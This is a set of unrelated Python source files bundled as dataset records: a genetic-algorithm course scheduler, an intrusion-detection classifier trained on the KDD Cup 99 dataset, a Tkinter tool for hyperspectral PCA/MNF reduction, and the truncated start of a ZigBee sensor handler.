newMax\n\t\t\tself.crossOver()\n\t\t\tself.sortSchedulesList()\n\t\t\tif int(random.random()*100)%2 == 1:\n\t\t\t\tself.mutation()\n\t\t\tself.trimPopulation()\n\t\t\tlater = time.time()\n\t\t\tdifference = int(later - now)\n\t\t\tprint(\"Generation Creation Time: \"+str(difference)+\" Seconds\")\n\t\t\t\n\t\tself.schedules[0].printOutput(newMax)\n\n\n\tdef printInfo(self):\n\t\tprint(\"All Plans:\")\n\t\tfor i in range(len(self.schedules)):\n\t\t\tself.schedules[i].printPlan()\n\nclass Professor:\n\tdef __init__(self, prof_id, number_of_courses, my_courses=[]):\n\t\tself.prof_id = prof_id\n\t\tself.my_courses = my_courses\n\t\tself.number_of_courses = number_of_courses\n\n\tdef printInfo(self):\n\t\tprint(\"prof_id: \"+ str(self.prof_id))\n\n\n\nclass University:\n\tdef __init__(self):\n\t\t#list of course and prof\n\t\tself.profs = []\n\t\tself.courses_by_profs = []\n\t\tself.all_courses = []\n\t\tself.sadness = []\n\t\tself.valueofHappiness = []\n\t\t# c\n\t\tself.NUMBER_OF_COURSES = 0 \n\t\t# p \n\t\tself.NUMBER_OF_PROFS = 0\n\t\t# t\n\t\tself.TIME_SLOT = 0\n\t\t# d\n\t\tself.DAY_SLOT = 0\n\n\t\tself.schedules = \"\"\n\t\t\n\n\tdef printInfo(self):\n\t\tprint(\"Professors: {}\".format(self.profs))\n\t\tprint(\"Courses: {}\".format(self.courses_by_profs))\n\t\tprint(\"Sadness: {}\".format(self.sadness))\n\n\n\tdef readInput(self):\t\n\t\tself.DAY_SLOT, self.TIME_SLOT = map(int, input().split())\n\t\tself.NUMBER_OF_COURSES = int(input())\n\t\tself.valueofHappiness = input().split()\n\t\tself.NUMBER_OF_PROFS = int(input())\n\t\tfor numP in range(self.NUMBER_OF_PROFS):\n\t\t\tprofCourses = input().split()\n\t\t\tprofCourses = convertListToInt(profCourses)\n\t\t\tnumOFCourses = profCourses[0]\n\t\t\tdel profCourses[0]\n\t\t\tself.profs.append(Professor(numP, numOFCourses,profCourses))\n\t\t\tself.courses_by_profs.append(profCourses)\n\t\tfor i in range(self.NUMBER_OF_COURSES):\n\t\t\tsadnessLine = input().split()\n\t\t\tsadnessLine = convertListToInt(sadnessLine)\n\t\t\tself.sadness.append(sadnessLine)\n\n\t\tself.makeAllCourses()\n\n\tdef makeAllCourses(self):\n\t\tprofID = -1;\t\t\n\t\tfor profCourse in self.courses_by_profs:\n\t\t\tprofID +=1\n\t\t\tif len(profCourse)>1:\n\t\t\t\tfor course in profCourse:\n\t\t\t\t\tself.all_courses.append(Course(course, profID))\n\t\t\telif len(profCourse)==1:\n\t\t\t\tself.all_courses.append(Course(profCourse[0], profID))\n\t\t\telse:\n\t\t\t\tcontinue\n\n\tdef createPopulation(self):\n\t\tself.schedules = AllSchedules(NUMBER_OF_SCHEDULES , self.DAY_SLOT, self.TIME_SLOT, self.all_courses, self.valueofHappiness, self.sadness)\n\t\tself.schedules.createSchedules()\n\t\tself.schedules.reachBestSchedule()\n\n\n\ndef test():\n\tprofCourses = input().split()\n\tprint (convertListToInt(profCourses))\n\ndef test2():\n\tprint(\"1{}\".format([1, 2, 3]))\n\n\ndef sortFile():\n\tcontent = []\n\tfile = open(OUTPUT_FILE_NAME, 'r')\n\tfor line in file:\n\t\tif line != '\\n':\n\t\t\tcontent.append(line.replace('\\n', ''))\n\tfile.close()\n\n\tfor passnum in range(len(content)-1,0,-1):\n\t\tfor i in range(1, passnum):\n\t\t\tline1Split = content[i].split()\n\t\t\tline2Split = content[i+1].split()\n\t\t\t# print(\"XX\")\n\t\t\t# print(line1Split)\n\t\t\t# print(line2Split)\n\t\t\tif int(line1Split[0])==int(line2Split[0]) and int(line1Split[1])==int(line2Split[1]) and int(line1Split[2])>int(line2Split[2]):\n\t\t\t\ttemp = copy.deepcopy(content[i])\n\t\t\t\tcontent[i] = copy.deepcopy(content[i+1])\n\t\t\t\tcontent[i+1] = copy.deepcopy(temp)\n\t\t\t\t# print(\"After Swap\")\n\t\t\t\t# print(str(line1Split[2])+\" > \"+str(line2Split[2]))\n\t\t\t\t# print(content[i])\n\t\t\t\t# print(content[i+1])\n\n\n\tfile = open(OUTPUT_FILE_NAME, 'w')\n\tfor line in content:\n\t\tfile.write(line+'\\n')\n\tfile.close()\n\n\ndef mainFunc():\n\tuni = University()\n\tuni.readInput()\n\tuni.createPopulation()\n\tsortFile()\n\nif __name__ == '__main__':\n\tnow = time.time()\n\tmainFunc()\n\tlater = time.time()\n\tdifference = int(later - now)\n\tprint(\"Total Time: \"+str(difference)+\" Seconds\")\n\n\n\n","sub_path":"Upload Files/changeCrossOver.py","file_name":"changeCrossOver.py","file_ext":"py","file_size_in_byte":14112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"575797266","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 13 09:55:52 2021\r\n\r\n@author: rbarb\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 11 00:27:04 2021\r\n\r\n@author: rbarb\r\n\"\"\"\r\n# ANN\r\n# Author: Robert Barbulescu\r\n\r\n# importing necessary packages \r\n\r\nfrom sklearn.decomposition import PCA\r\nimport pandas as pd\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom time import time\r\nimport numpy as np\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import confusion_matrix, accuracy_score, classification_report, f1_score, roc_curve, cohen_kappa_score\r\nimport sklearn.metrics as metrics\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\r\n\r\n# used for better plots\r\nplt.style.use('ggplot')\r\n\r\n# The features existing on the dataset \r\n# The features names were obtained from: http://kdd.ics.uci.edu/databases/kddcup99/kddcup.names\r\nfeatures = [\"duration\",\"protocol_type\",\"service\",\"flag\",\"src_bytes\",\r\n \"dst_bytes\",\"land\",\"wrong_fragment\",\"urgent\",\"hot\",\"num_failed_logins\",\r\n \"logged_in\",\"num_compromised\",\"root_shell\",\"su_attempted\",\"num_root\",\r\n \"num_file_creations\",\"num_shells\",\"num_access_files\",\"num_outbound_cmds\",\r\n \"is_host_login\",\"is_guest_login\",\"count\",\"srv_count\",\"serror_rate\",\r\n \"srv_serror_rate\",\"rerror_rate\",\"srv_rerror_rate\",\"same_srv_rate\",\r\n \"diff_srv_rate\",\"srv_diff_host_rate\",\"dst_host_count\",\"dst_host_srv_count\",\r\n \"dst_host_same_srv_rate\",\"dst_host_diff_srv_rate\",\"dst_host_same_src_port_rate\",\r\n \"dst_host_srv_diff_host_rate\",\"dst_host_serror_rate\",\"dst_host_srv_serror_rate\",\r\n \"dst_host_rerror_rate\",\"dst_host_srv_rerror_rate\",\"label\"]\r\n\r\n# Mounting and reaidng the csv file with the dataset\r\n# Also available using sklearn packgae: https://scikit-learn.org/stable/modules/generated/sklearn.datasets.fetch_kddcup99.html\r\ndataset = pd.read_csv(r\"C:\\Users\\rbarb\\Desktop\\ANN\\kddcup.data_10_percent_corrected\", names = features, header=None)\r\n\r\n# The number of samples and dimensions\r\nprint('Data Points:',dataset.shape[0])\r\nprint('Features:',dataset.shape[1])\r\nprint(\"Initial data shape is:\", dataset.shape)\r\nprint(\"=======================================================================\")\r\n\r\n# remove any existing duplicates\r\ndataset.drop_duplicates(subset=None, keep='first', inplace=True)\r\nprint(\"Duplicates succesfully dropped.\")\r\nprint(\"Dataset shape is:\", dataset.shape)\r\nprint(\"=======================================================================\")\r\n\r\n# Looking for any NULL values\r\nprint('Null values existing: ',len(dataset[dataset.isnull().any(1)]))\r\nprint(\"=======================================================================\")\r\n\r\n# Change Multi-class to binary-class\r\ndataset['label'] = dataset['label'].replace(['back.', 'buffer_overflow.', 'ftp_write.', 'guess_passwd.', 'imap.', 'ipsweep.', 'land.', 'loadmodule.', 'multihop.', 'neptune.', 'nmap.', 'perl.', 'phf.', 'pod.', 'portsweep.', 'rootkit.', 'satan.', 'smurf.', 'spy.', 'teardrop.', 'warezclient.', 'warezmaster.'], 'attack')\r\n\r\nx = dataset.iloc[:, :-1].values\r\ny = dataset.iloc[:, 41].values\r\n\r\n# Encoding categorical data of 3 fields: protocol_type, service, and flag\r\nencoder = LabelEncoder()\r\nx[:, 1] = encoder.fit_transform(x[:, 1])\r\nx[:, 2] = encoder.fit_transform(x[:, 2])\r\nx[:, 3] = encoder.fit_transform(x[:, 3])\r\n\r\ny = encoder.fit_transform(y)\r\n\r\n# Display newly structured classes \r\nprint(dataset.groupby('label')['label'].count())\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.3, random_state = 0)\r\nprint(\"Size of training Data is % d and Testing Data is % d\" %(\r\n y_train.shape[0], y_test.shape[0]))\r\nprint(\"=======================================================================\")\r\n\r\n# Feature Scalling\r\nscaler = StandardScaler()\r\nx_train = scaler.fit_transform(x_train)\r\nx_test = scaler.transform(x_test)\r\n\r\n# Plotting the variance \r\npca = PCA().fit(x_train)\r\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\r\nplt.xlabel('Number of Features')\r\nplt.ylabel('Cumulative Explained Variance')\r\n\r\nplt.show()\r\n\r\npca = PCA(copy=True, iterated_power='auto', n_components=30, random_state=None,\r\n svd_solver='auto', tol=0.0, whiten=False).fit(x_train)\r\n\r\nlda = LDA().fit(pca.transform(x_train), y_train)\r\n\r\nx_train_lda = lda.transform(pca.transform(x_train))\r\nx_test_lda = lda.transform(pca.transform(x_test))\r\n\r\nt0 = time()\r\n\r\nprint(\"Sample Data point after applying PCA\\n\", x_train_lda[0])\r\nprint(\"=======================================================================\")\r\nprint(\"Dimesnsions of training set = % s and Test Set = % s\"%(\r\n x_train.shape, x_test.shape)) \r\nprint(\"Fitting the classifier to the training set\")\r\nprint(\"=======================================================================\")\r\n\r\nclf = SVC(kernel='linear',class_weight=\"balanced\", gamma = \"auto\")\r\nclf = clf.fit(x_train_lda, y_train)\r\nprint(\"Done in %0.3fs\" % (time() - t0))\r\n\r\ny_pred = clf.predict(x_test_lda)\r\n\r\nprint(\"=======================================================================\")\r\nprint(\"Accuracy score:{:.2f}%\".format(metrics.accuracy_score(y_test, y_pred)*100))\r\nprint(\"=======================================================================\")\r\nprint(\"Number of mislabeled points out of a total %d points is %d\" % (x_test.shape[0], (y_test != y_pred).sum()))\r\nprint(\"=======================================================================\")\r\n\r\ntarget_names = ['Attack', 'Normal']\r\n# print classifiction results\r\nprint(classification_report(y_test, y_pred, target_names=target_names))\r\n# print confusion matrix\r\nprint(\"=======================================================================\")\r\nprint(\"Confusion Matrix is:\")\r\nprint(confusion_matrix(y_test, y_pred))\r\nprint(\"=======================================================================\")","sub_path":"src/binary/LDA-SVM_binary.py","file_name":"LDA-SVM_binary.py","file_ext":"py","file_size_in_byte":5965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148202681","text":"import tkinter as tk\nfrom tkinter import*\nfrom spectral import*\nimport spectral.io.envi as envi\nfrom tkinter.filedialog import askopenfilename \ndef s5():\n t.destroy()\n t2=Toplevel(root)\n t2.title(\"PCA\")\n t2.resizable(width=False,height=False)\n l=txtVar.get()\n f=txtVar4.get()\n j=txtVar11.get()\n g=open(j+\".txt\",'w')\n g.write(\"Mean Value:\\n\")\n count=1\n for k1 in pc.mean:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(str(k1))\n g.write(\"\\n\")\n count=count+1\n g.write(\"\\n\") \n g.write(\"EigenValues:\\n\")\n count=1\n for k2 in pc.eigenvalues:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(str(k2))\n g.write(\"\\n\")\n count=count+1\n g.write(\"\\n\") \n g.write(\"Covariance:\\n\")\n count=1\n for k3 in pc.cov:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(\"\\t\")\n g.write(str(k3))\n g.write(\"\\n\")\n g.write(\"\\n\")\n count=count+1\n g.close() \n d=int(l)\n pc_0999 = pc.reduce(num=d)\n img_pc = pc_0999.transform(mylib)\n envi.save_image(f+\".hdr\",img_pc)\n widget = Label(t2, text='Successfully Completed') \n widget.pack()\n widget.mainloop()\ndef s1():\n t3.destroy()\n t2=Toplevel(root)\n t2.title(\"MNF\")\n t2.resizable(width=False,height=False)\n d=txtVar2.get()\n r=txtVar3.get()\n f1=txtVar5.get()\n j=txtVar9.get()\n g=open(j+\".txt\",'w')\n g.write(\"Mean Value:\\n\")\n count=1\n for k1 in pc.mean:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(str(k1))\n g.write(\"\\n\")\n count=count+1\n g.write(\"\\n\") \n g.write(\"EigenValues:\\n\")\n count=1\n for k2 in pc.eigenvalues:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(str(k2))\n g.write(\"\\n\")\n count=count+1\n g.write(\"\\n\") \n g.write(\"Covariance:\\n\")\n count=1\n for k3 in pc.cov:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(\"\\t\")\n g.write(str(k3))\n g.write(\"\\n\")\n g.write(\"\\n\")\n count=count+1\n g.close()\n s=int(d)\n f=float(r)\n signal = calc_stats(mylib)\n noise = noise_from_diffs(mylib[117: 137, 85: 122, :])\n pc1 = mnf(signal, noise)\n denoised = pc1.denoise(mylib,snr=f)\n pc_0999 = pc1.reduce(mylib,num=s)\n img_pc = pc_0999.transform(mylib)\n envi.save_image(f1+\".hdr\",img_pc)\n j=txtVar10.get()\n g=open(j+\".txt\",'w')\n h=txtVar3.get()\n g.write(\"SNR Ratio: \")\n g.write(h)\n g.write(\"\\n\")\n g.write(\"Mean Value:\\n\")\n count=1\n for k1 in noise.mean:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(str(k1))\n g.write(\"\\n\")\n g.write(\"\\n\")\n count=count+1\n g.write(\"\\n\") \n g.write(\"Covariance:\\n\")\n g.write(\"\\n\")\n count=1\n for k3 in noise.cov:\n g.write(\"Band\")\n g.write(str(count))\n g.write(\"\\t\")\n g.write(\"\\t\")\n g.write(str(k3))\n g.write(\"\\n\")\n g.write(\"\\n\")\n count=count+1\n g.close()\n widget = Label(t2, text='Successfully Completed') \n widget.pack()\n widget.mainloop()\ndef OnDouble(t): \n location = lb.curselection()[0]\n value=lb.get(location)\n s=sf[value]\n l=gt.read_band(s)\n cview = imshow(classes=l) \ndef pee(t):\n location=lb1.curselection()[0]\n value=lb1.get(location)\n s=sf1[value]\n txtVar2.set(s)\ndef pee1(t):\n location=lb2.curselection()[0]\n value=lb2.get(location)\n s=sf2[value]\n txtVar.set(s)\ndef yes(nbands):\n global t\n t=Toplevel(root)\n t.geometry(\"500x370\")\n t.resizable(width=False, height=False)\n t.title(\"PCA\")\n v = StringVar()\n Label(t, textvariable=v,font = ('Times New Roman', 12, 'bold')).place(x=10,y=0)\n v.set(\"Total number of bands in image: \")\n v6 = StringVar()\n Label(t, textvariable=v6,font = ('Times New Roman', 14, 'bold'),fg='red').place(x=235,y=0)\n d=str(nbands)\n v6.set(d)\n v3=StringVar()\n k=tk.Label(t, textvariable=v3,font = ('Times New Roman',10))\n k.place(x=10,y=40)\n v3.set(\"Enter the output file name( Without Extension ):\")\n global txtVar4\n txtVar4 = StringVar(None)\n usrIn = Entry(t, textvariable = txtVar4, width =20)\n usrIn.place(x=300,y=40)\n v1=StringVar()\n Label(t, textvariable=v1,font = ('Times New Roman',10)).place(x=10,y=80)\n v1.set(\"Enter the no. of components desired:**\")\n v7 = StringVar()\n Label(t, textvariable=v7,font = ('Times New Roman', 10)).place(x=85,y=100)\n v7.set(\"(<=No. of input band )\")\n global txtVar\n txtVar = StringVar(None)\n usrIn = Entry(t, textvariable = txtVar, width =20)\n usrIn.place(x=300,y=80)\n global pc\n pc = principal_components(mylib)\n v7=StringVar()\n Label(t, textvariable=v7,font = ('Times New Roman',10)).place(x=10,y=140)\n v7.set(\"Select the no. of components based on eigen values:\")\n global lb2\n lb2=Listbox(t, width=13,height=7)\n scrollbar =tk.Scrollbar(t,command=lb2.yview,orient=\"vertical\")\n scrollbar.place(x=380,y=140,height=117)\n global sf2\n sf2=dict()\n count=1\n for l in pc.eigenvalues:\n g = float(\"{0:.10f}\".format(l))\n s=str(g)\n sf2[s]=count\n lb2.insert(END,s)\n count=count+1\n lb2.place(x=300,y=140) \n lb2.configure(yscrollcommand=scrollbar.set)\n lb2.bind(\"<>\",pee1)\n v8 = StringVar()\n Label(t, textvariable=v8,font = ('Times New Roman', 10)).place(x=10,y=290)\n v8.set(\"Enter the output statistics file name:\")\n global txtVar11\n txtVar11 = StringVar(None)\n usrIn = Entry(t, textvariable = txtVar11, width =20)\n usrIn.place(x=300,y=290)\n button = tk.Button(t, text=\"Cancel\",command=t.destroy)\n button.place(x=350,y=345)\n button = tk.Button(t, text=\"OK\",command=s5)\n button.place(x=300,y=345)\ndef yes2(nbands):\n global t3\n t3=Toplevel(root)\n t3.geometry(\"500x450\")\n t3.resizable(width=False, height=False)\n t3.title(\"MNF\")\n v = StringVar()\n Label(t3, textvariable=v,font = ('Times New Roman', 12, 'bold')).place(x=10,y=0)\n v.set(\"Total number of bands in image: \")\n v6 = StringVar()\n Label(t3, textvariable=v6,font = ('Times New Roman', 14, 'bold'),fg='red').place(x=235,y=0)\n d=str(nbands)\n v6.set(d)\n v3=StringVar()\n k=tk.Label(t3, textvariable=v3,font = ('Times New Roman',10))\n k.place(x=10,y=40)\n v3.set(\"Enter the output file name( Without Extension ):\")\n global txtVar5\n txtVar5 = StringVar(None)\n usrIn = Entry(t3, textvariable = txtVar5, width =20)\n usrIn.place(x=300,y=40)\n v1=StringVar()\n Label(t3, textvariable=v1,font = ('Times New Roman',10)).place(x=10,y=80)\n v1.set(\"Enter the no. of components desired:**\")\n v7 = StringVar()\n Label(t3, textvariable=v7,font = ('Times New Roman', 10)).place(x=85,y=100)\n v7.set(\"(<=No. of input band )\")\n global txtVar2\n txtVar2 = StringVar(None)\n usrIn = Entry(t3, textvariable = txtVar2, width =20)\n usrIn.place(x=300,y=80)\n v2=StringVar()\n Label(t3, textvariable=v2,font = ('Times New Roman',10)).place(x=10,y=140)\n v2.set(\"Enter SNR ratio: \")\n global txtVar3\n txtVar3 = StringVar(None)\n usrIn = Entry(t3, textvariable = txtVar3, width =20)\n usrIn.place(x=300,y=140)\n pc = principal_components(mylib)\n v7=StringVar()\n Label(t3, textvariable=v7,font = ('Times New Roman',10)).place(x=10,y=180)\n v7.set(\"Select the no. of components based on eigen values:\")\n global lb1\n lb1=Listbox(t3, width=13,height=7)\n scrollbar =tk.Scrollbar(t3,command=lb1.yview,orient=\"vertical\")\n scrollbar.place(x=380,y=180,height=117)\n global sf1\n sf1=dict()\n count=1\n for l in pc.eigenvalues:\n g = float(\"{0:.10f}\".format(l))\n s=str(g)\n sf1[s]=count\n lb1.insert(END,s)\n count=count+1\n lb1.place(x=300,y=180) \n lb1.configure(yscrollcommand=scrollbar.set)\n lb1.bind(\"<>\",pee)\n v8 = StringVar()\n Label(t3, textvariable=v8,font = ('Times New Roman', 10)).place(x=10,y=330)\n v8.set(\"Enter the output statistics file name:\")\n global txtVar9\n txtVar9 = StringVar(None)\n usrIn = Entry(t3, textvariable = txtVar9, width =20)\n usrIn.place(x=300,y=330)\n v9 = StringVar()\n Label(t3, textvariable=v9,font = ('Times New Roman', 10)).place(x=10,y=370)\n v9.set(\"Enter the noise output statistics file name of:\")\n global txtVar10\n txtVar10 = StringVar(None)\n usrIn = Entry(t3, textvariable = txtVar10, width =20)\n usrIn.place(x=300,y=370)\n button = tk.Button(t3, text=\"Cancel\",command=t3.destroy)\n button.place(x=350,y=415)\n button = tk.Button(t3, text=\"OK\",command=s1)\n button.place(x=300,y=415)\ndef donothing():\n filewin=Toplevel(root)\n button=Button(filewin,text=\"Do nothing button\")\n button.pack() \ndef pcatxt():\n t3=Toplevel(root)\n t3.title(\"Principal Component Analysis\")\n t3.geometry(\"600x210\")\n t3.resizable(width=False,height=False)\n v1=StringVar()\n Label(t3,textvariable=v1,font = ('Times New Roman',10)).pack()\n v1.set(\"The main linear technique for dimensionality reduction, principal component analysis, performs a\")\n v2=StringVar()\n Label(t3,textvariable=v2,font = ('Times New Roman',10)).pack()\n v2.set(\"linear mapping of the data to a lower-dimensional space in such a way that the variance of the data\")\n v3=StringVar()\n Label(t3,textvariable=v3,font = ('Times New Roman',10)).pack()\n v3.set(\"in the low-dimensional representation is maximized. In practice, the covariance (and sometimes the\")\n v4=StringVar()\n Label(t3,textvariable=v4,font = ('Times New Roman',10)).pack()\n v4.set(\"correlation) matrix of the data is constructed and the eigen vectors on this matrix are computed.\")\n v5=StringVar()\n Label(t3,textvariable=v5,font = ('Times New Roman',10)).pack()\n v5.set(\"The eigen vectors that correspond to the largest eigenvalues (the principal components) can now be\")\n v6=StringVar()\n Label(t3,textvariable=v6,font = ('Times New Roman',10)).pack()\n v6.set(\"used to reconstruct a large fraction of the variance of the original data. Moreover, the first few\")\n v7=StringVar()\n Label(t3,textvariable=v7,font = ('Times New Roman',10)).pack()\n v7.set(\"eigen vectors can often be interpreted in terms of the large-scale physical behavior of the system.\")\n v8=StringVar()\n Label(t3,textvariable=v8,font = ('Times New Roman',10)).pack()\n v8.set(\"The original space (with dimension of the number of points) has been reduced (with data loss, but\")\n v9=StringVar()\n Label(t3,textvariable=v9,font = ('Times New Roman',10)).pack()\n v9.set(\"hopefully retaining the most important variance) to the space spanned by a few eigenvectors.\")\ndef ddrtxt():\n t3=Toplevel(root)\n t3.title(\"What is data dimensionality reduction\")\n t3.geometry(\"600x170\")\n t3.resizable(width=False,height=False)\n v1=StringVar()\n Label(t3,textvariable=v1,font = ('Times New Roman',10)).pack()\n v1.set(\"Dimensionality reduction is all about transforming data into a low-dimensional space in which data\")\n v2=StringVar()\n Label(t3,textvariable=v2,font = ('Times New Roman',10)).pack()\n v2.set(\"preserves its euclidean structure but does not suffer from curse of dimensionality. For instance \")\n v3=StringVar()\n Label(t3,textvariable=v3,font = ('Times New Roman',10)).pack()\n v3.set(\"assume you extract some word features [x1,...,xn][x1,...,xn] from a data set where each document can\")\n v4=StringVar()\n Label(t3,textvariable=v4,font = ('Times New Roman',10)).pack()\n v4.set(\"be modeled as a point in n-dimensional space and n is too large (a toy example). In this case many\")\n v5=StringVar()\n Label(t3,textvariable=v5,font = ('Times New Roman',10)).pack()\n v5.set(\"algorithms do not work according to the distance distortion of high-dimensional space. Now you \")\n v6=StringVar()\n Label(t3,textvariable=v6,font = ('Times New Roman',10)).pack()\n v6.set(\"need to reduce dimensionality by either selecting most informative features or transforming them \")\n v7=StringVar()\n Label(t3,textvariable=v7,font = ('Times New Roman',10)).pack()\n v7.set(\"into a low-dimensional manifold using dimensionality reduction methods e.g. PCA, MNF, etc.\") \ndef mnftxt():\n t3=Toplevel(root)\n t3.title(\"Minimum Noise Fraction\")\n t3.geometry(\"600x180\")\n t3.resizable(width=False,height=False)\n v1=StringVar()\n Label(t3,textvariable=v1,font = ('Times New Roman',10)).pack()\n v1.set(\"The bands in a hyperspectral dataset have differing noise levels (S/N). It may be desirable to \")\n v2=StringVar()\n Label(t3,textvariable=v2,font = ('Times New Roman',10)).pack()\n v2.set(\"filter or remove those bands that contribute most to noise. When the bands of a hyperspectral \")\n v3=StringVar()\n Label(t3,textvariable=v3,font = ('Times New Roman',10)).pack()\n v3.set(\"dataset have differing amounts of noise, a standard principal components (PC) transform will not\")\n v4=StringVar()\n Label(t3,textvariable=v4,font = ('Times New Roman',10)).pack()\n v4.set(\"produce components with a steadily increasing noise level. This makes it difficult to select a \")\n v5=StringVar()\n Label(t3,textvariable=v5,font = ('Times New Roman',10)).pack()\n v5.set(\"cutoff point. To achieve a components dataset that does have increasing noise (decreasing S/N), a\")\n v6=StringVar()\n Label(t3,textvariable=v6,font = ('Times New Roman',10)).pack()\n v6.set(\"modified PC transform, termed the Minimum Noise Fraction (MNF) has been developed (Green et \")\n v7=StringVar()\n Label(t3,textvariable=v7,font = ('Times New Roman',10)).pack()\n v7.set(\"al. 1988, Lee et al. 1990). The MNF transform produces a set of principal component images \")\n v8=StringVar()\n Label(t3,textvariable=v8,font = ('Times New Roman',10)).pack()\n v8.set(\"ordered in terms of decreasing signal quality.\")\ndef abtxt():\n t3=Toplevel(root)\n t3.title(\"About Software\")\n t3.geometry(\"450x220\")\n t3.resizable(width=False,height=False)\n v = StringVar()\n Label(t3, textvariable=v,font = ('Times New Roman', 12, 'bold')).place(x=10,y=0)\n v.set(\"Prepared By: \")\n v1 = StringVar()\n Label(t3, textvariable=v1,font = ('Times New Roman', 12, 'bold')).place(x=300,y=0)\n v1.set(\"Guided By: \")\n v2 = StringVar()\n Label(t3, textvariable=v2,font = ('Times New Roman', 12, 'bold'),fg='red').place(x=10,y=175)\n v2.set(\"Manoj Kumar\")\n v3= StringVar()\n Label(t3, textvariable=v3,font = ('Times New Roman', 12, 'bold'),fg='red').place(x=10,y=195)\n v3.set(\"ECE ,Nit Hamirpur\")\n v4 = StringVar()\n Label(t3, textvariable=v4,font = ('Times New Roman', 12, 'bold'),fg='red').place(x=300,y=175)\n v4.set(\"Vinay Kumar\")\n v5 = StringVar()\n Label(t3, textvariable=v5,font = ('Times New Roman', 12, 'bold'),fg='red').place(x=300,y=195)\n v5.set(\"Scientist/Engineer\")\n img = tk.PhotoImage(file=\"manoj.png\")\n panel = tk.Label(t3,image = img)\n panel.place(x=10,y=40)\n img1 = tk.PhotoImage(file=\"Vinay-kumar.png\")\n panel1 = tk.Label(t3,image = img1,width=100,height=130)\n panel1.place(x=300,y=40)\n panel.mainloop()\n panel1.mainloop()\ndef pcaf():\n name= askopenfilename() \n global mylib\n mylib = envi.open(name)\n nbands = mylib.shape[-1]\n yes(nbands)\ndef mnff():\n name= askopenfilename() \n global mylib\n mylib = envi.open(name)\n nbands = mylib.shape[-1]\n yes2(nbands) \ndef open_image():\n t4=Toplevel(root)\n global gt \n name = askopenfilename()\n gt = envi.open(name)\n nbands = gt.shape[-1]\n scrollbar = Scrollbar()\n global lb\n lb = tk.Listbox(t4,yscrollcommand=scrollbar.set)\n scrollbar.config(command=lb.yview)\n scrollbar.pack(side=RIGHT, fill=Y)\n global sf\n sf=dict()\n for l in range(nbands):\n s=\"Band \"+str(l+1)\n sf[s]=l\n lb.insert(tk.END,s) \n lb.pack(side=\"top\", fill=\"both\", expand=True) \n lb.bind(\"<>\",OnDouble) \nroot=tk.Tk()\nroot.geometry(\"400x300\")\nroot.resizable(width=False, height=False)\nroot.title(\"Data Dimensionality Reduction\")\nmenubar=Menu(root)\nfilemenu=Menu(menubar,tearoff=0)\nfilemenu.add_command(label=\"Image\",command=open_image)\nfilemenu.add_separator()\nfilemenu.add_command(label=\"Exit\",command=root.destroy)\nmenubar.add_cascade(label=\"File\",menu=filemenu)\nDDRmenu=Menu(menubar,tearoff=0)\nPCA=Menu(DDRmenu,tearoff=0)\nKernalPCA=Menu(DDRmenu,tearoff=0)\nMNF=Menu(DDRmenu,tearoff=0)\nICA=Menu(DDRmenu,tearoff=0)\nLDA=Menu(DDRmenu,tearoff=0)\nmenubar.add_cascade(label=\"DDR\",menu=DDRmenu)\nDDRmenu.add_command(label=\"PCA\",command=pcaf)\nDDRmenu.add_command(label=\"MNF\",command=mnff)\nhelpmenu=Menu(menubar,tearoff=0)\nhelpmenu.add_command(label=\"DDR\",command=ddrtxt)\nhelpmenu.add_command(label=\"PCA\",command=pcatxt)\nhelpmenu.add_command(label=\"MNF\",command=mnftxt)\nmenubar.add_cascade(label=\"Help\",menu=helpmenu)\nabout=Menu(menubar,tearoff=0)\nabout.add_command(label=\"About Software\",command=abtxt)\nmenubar.add_cascade(label=\"About\",menu=about)\nroot.config(menu=menubar)\nroot.mainloop()\n\n\n\n\n","sub_path":"Data Dimensionality Reduction.py","file_name":"Data Dimensionality Reduction.py","file_ext":"py","file_size_in_byte":17626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"337856117","text":"#import RPi.GPIO as GPIO\r\n#import Adafruit_DHT\r\nfrom Crypto.Hash import MD5\r\nimport serial\r\nimport binascii\r\nimport time\r\nimport zb_HandshakeHub\r\n#import clientEgress\r\n#import ReceiveV2\r\n\r\nzb = zb_HandshakeHub.zb\r\n\r\ndef Push(payload):\r\n\t#GPIO.setmode(GPIO.BCM)\r\n\t#GPIO.setup(4, GPIO.OUT)\r\n\r\n\tif(payload.decode() == 'lumos'):\r\n\t\tprint('DEBUG: light is on')\r\n\t#\tGPIO.output(4, 1)\r\n\telse:\r\n\t\tprint('DEBUG: light is off')\r\n\t#\tGPIO.output(4, 0)\r\n\tprint(\"PUSH RECEIVED: PAYLOAD IS \", payload)\r\n\r\n\r\n\r\n# def PullReq(parsePacket):\r\n\r\n# \thum, temp = 22,45\r\n# \thum = int(hum)\r\n# \ttemp = int(temp)\r\n# \tpacket = clientEgress.clientEncapsulate(b'\\x02',parsePacket['src'],parsePacket['dest'],temp,ReceiveV2.secret)\r\n# \tpublish(packet)\r\n\r\ndef PullRep(payload):\r\n\r\n\tprint(\"pull replied: \",int.from_bytes(payload,byteorder='big'))\r\n\r\ndef PullReq(parsePacket, secret, zb):\r\n\t#hum, temp = Adafruit_DHT.read_retry(11, 4)\r\n\thum ,temp = 22,45\r\n\thum = int(hum)\r\n\ttemp = 